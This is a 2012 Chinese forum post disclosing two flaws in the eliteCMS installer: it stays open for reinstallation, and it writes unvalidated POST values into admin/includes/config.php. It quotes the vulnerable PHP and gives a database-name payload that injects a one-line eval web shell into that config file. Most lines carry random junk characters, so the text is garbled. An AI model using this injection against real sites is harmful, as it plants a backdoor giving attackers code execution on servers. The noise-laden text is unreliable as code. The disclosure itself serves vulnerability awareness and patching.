eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
' j+ [: I! x4 e) l5 K0 K# C; J9 B# \+ u2 z: x8 }
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
' f5 w8 Z% @. G5 W. u我们来看代码:
( C0 v/ w3 R$ ~% F$ R1 z - C) w+ f! R5 J# t" [) \& ]+ r, d
...
. k/ c- F$ U G$ m1 x& v, D0 e" }elseif ($_GET['step'] == "4") {
5 @: G5 p+ V" b' [. z $file = "../admin/includes/config.php"; F9 l( l2 D7 H, x5 z7 w7 C0 y: ]. g
$write = "<?php\n";
2 Z5 X2 J {! ^+ ~9 p/ E, z3 V) r+ V $write .= "/**\n";
$ z h3 L! T8 E7 r9 [2 |" T $write .= "*\n";. Z9 a* T4 }* y; ^& z/ g6 W
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
% y- a& F6 N9 s! A0 v" a...略...- E. u, K0 \2 {! l; x
$write .= "*\n";
, T' ^6 r! D. ]1 } $write .= "*/\n";7 b5 L5 w/ \) W$ t$ u( j
$write .= "\n";
0 Y3 [+ Q4 {1 J5 W6 I4 V2 ] $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n"; v' `9 t# `, h4 q( a# o Z& d" O/ w
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";; x5 |0 H% r: q! {8 C- w
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
- T1 M3 Q+ C! ^" a: I! J- s. C $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
, g1 A7 D7 H8 F& u5 N $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";+ m6 @: ~! \) x0 x C
$write .= "if (!\$connection) {\n";* |! ?+ n: [$ Y- @# ]
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$ }( S% _& @" _9 |: I. G* ^ $write .= " \n";& P3 o% h/ j. Y3 ]" ~# b
$write .= "} \n";( | Q3 e& f9 w& k* j0 ]
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
2 X1 C* `$ h3 S* u $write .= "if (!\$db_select) {\n";7 \, p2 j. Z; p d
$write .= " die(\"Database select failed\" .mysql_error());\n";
9 D2 E: |7 m8 B9 J9 Y $write .= " \n";
5 c) R+ l1 ^' s) ^" I% Z $write .= "} \n";( Y3 N/ J" {' x) t- Q6 x& |2 ~
$write .= "?>\n";
( ?% p0 w% Q/ J8 |, `
* t: G2 `" {9 B) q $writer = fopen($file, 'w');
, T2 b5 s4 r$ ^* `! p8 }$ V- F0 h/ ^...
4 w, v6 ~7 R2 @+ h9 ?- y9 G
; ~8 D) J5 @# T- P. R5 V在看代码:) ~- m) j" B+ s7 C% I) o
$ v; x& X5 r! G% W2 w) x1 O
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER']; y$ z0 ~. Y( K8 w, Z
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];4 ]) \' V4 @/ \- R% j
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ k' W+ {2 J0 J/ T2 q) {
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
. Z4 d* z* i4 K* u, F/ A8 |
2 x# H4 E4 `6 D7 H& }取值未作任何验证- t+ f" h K2 i. H% w: i6 v
如果将数据库名POST数据:
9 s- c' B4 J7 }( @3 {7 s+ [ & k# h; c' p$ [% t
"?><?php eval($_POST[c]);?><?php
9 w+ l( m6 C u4 u$ `
) T( t: Z: {* J3 X0 |! n将导致一句话后门写入/admin/includes/config.php" p; B6 K4 C2 W, Y1 ]2 `
|
发表于 2012-11-18 13:59:27
收藏
支持
反对